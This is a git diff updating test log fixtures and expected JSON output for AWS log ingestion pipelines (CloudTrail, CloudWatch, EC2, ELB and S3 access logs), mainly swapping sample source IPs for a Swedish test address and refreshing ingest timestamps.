"{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE:devdsk\",\"arn\":\"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk\",\"accountId\":\"777788889999\",\"accessKeyId\":\"AKIAQRSTUVWXYZEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2016-11-14T17:25:26Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE\",\"arn\":\"arn:aws:iam::777788889999:role/AssumeNothing\",\"accountId\":\"777788889999\",\"userName\":\"AssumeNothing\"}}},\"eventTime\":\"2016-11-14T17:25:45Z\",\"eventSource\":\"s3.amazonaws.com\",\"eventName\":\"DeleteBucket\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]\",\"requestParameters\":{\"bucketName\":\"my-test-bucket-cross-account\"},\"responseElements\":null,\"requestID\":\"EXAMPLE463D56D4C\",\"eventID\":\"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"777788889999\"}", "provider": "s3.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log index f8a9bc9e2a3..9b440298c64 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log @@ -1,2 +1,2 @@ -{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"205.251.233.182","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"} +{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"} {"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"EXAMPLE_ID","arn":"arn:aws:iam::0123456789012:user/Alice","accountId":"0123456789012","accessKeyId":"EXAMPLE_KEY","userName":"Alice","sessionContext":{"sessionIssuer":{},"webIdFederationData":{},"attributes":{"mfaAuthenticated":"true","creationDate":"2020-01-08T15:12:16Z"}},"invokedBy":"signin.amazonaws.com"},"eventTime":"2020-01-08T20:58:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-west-2","sourceIPAddress":"127.0.0.1","userAgent":"signin.amazonaws.com","requestParameters":{"name":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","isMultiRegionTrail":true,"enableLogFileValidation":false,"kmsKeyId":""},"responseElements":{"name":"TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","snsTopicARN":"","includeGlobalServiceEvents":true,"isMultiRegionTrail":true,"trailARN":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","logFileValidationEnabled":false,"isOrganizationTrail":false},"requestID":"EXAMPLE-f3da-42d1-84f5-EXAMPLE","eventID":"EXAMPLE-b5e9-4846-8407-EXAMPLE","readOnly":false,"eventType":"AwsApiCall","recipientAccountId":"0123456789012"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json index e3486fecddc..754605022ee 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json @@ -3,25 +3,25 @@ { "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Boardman", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -119.7143, - "lat": 45.8491 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 16509, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "205.251.233.182", - "ip": "205.251.233.182" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"205.251.233.182\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", + "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "cloudtrail.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json index d527126412f..8e4cce3a5fd 100644 --- a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json +++ b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json @@ -6,7 +6,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.696763200Z", + "ingested": "2021-12-09T16:11:58.525004600Z", "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root." }, "aws": { @@ -24,7 +24,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.696773100Z", + "ingested": "2021-12-09T16:11:58.525012700Z", "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms." }, "aws": { @@ -42,7 +42,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.696779400Z", + "ingested": "2021-12-09T16:11:58.525017900Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)" }, "aws": { @@ -60,7 +60,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.696787200Z", + "ingested": "2021-12-09T16:11:58.525022500Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)" }, "aws": { @@ -78,7 +78,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.696796900Z", + "ingested": "2021-12-09T16:11:58.525027400Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds." }, "aws": { @@ -96,7 +96,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.696803300Z", + "ingested": "2021-12-09T16:11:58.525032300Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s" }, "aws": { diff --git a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json index 3b392d73df2..4298569cb31 100644 --- a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json +++ b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json @@ -9,7 +9,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.871450600Z", + "ingested": "2021-12-09T16:11:58.684169900Z", "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root." }, "aws": { @@ -31,7 +31,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.871462200Z", + "ingested": "2021-12-09T16:11:58.684178100Z", "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms." }, "aws": { @@ -53,7 +53,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.871471900Z", + "ingested": "2021-12-09T16:11:58.684183300Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)" }, "aws": { @@ -75,7 +75,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.871481300Z", + "ingested": "2021-12-09T16:11:58.684188400Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)" }, "aws": { @@ -97,7 +97,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.871490800Z", + "ingested": "2021-12-09T16:11:58.684193500Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds." }, "aws": { @@ -119,7 +119,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-19T21:47:04.871508100Z", + "ingested": "2021-12-09T16:11:58.684198500Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s" }, "aws": { diff --git a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json index fd112d6830d..baf96cc0f76 100644 --- a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json +++ b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json @@ -43,7 +43,7 @@ } }, "event": { - "ingested": "2021-07-19T21:47:05.084930900Z", + "ingested": "2021-12-09T16:11:58.868846100Z", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", "kind": "event", "start": "2018-07-02T22:22:48.364000Z", diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log index e56b8a34ed9..bcc9f6af0d2 100644 --- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log +++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log @@ -1,7 +1,7 @@ -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 17 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 3 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1" 200 - 265 - 2 1 "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 4 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 17 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 3 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1" 200 - 265 - 2 1 "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 4 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz "PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1" 200 - - 773 103 13 "-" "-" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 - diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json index 05517ceda6a..abd3a9e4751 100644 --- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json +++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json @@ -10,15 +10,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -32,7 +32,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -51,8 +51,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", @@ -61,8 +61,8 @@ }, "event": { "duration": 17000000, - "ingested": "2021-07-19T21:47:05.259665700Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134194800Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", "id": "44EE8651683CB4DA", @@ -83,7 +83,7 @@ "host_id": 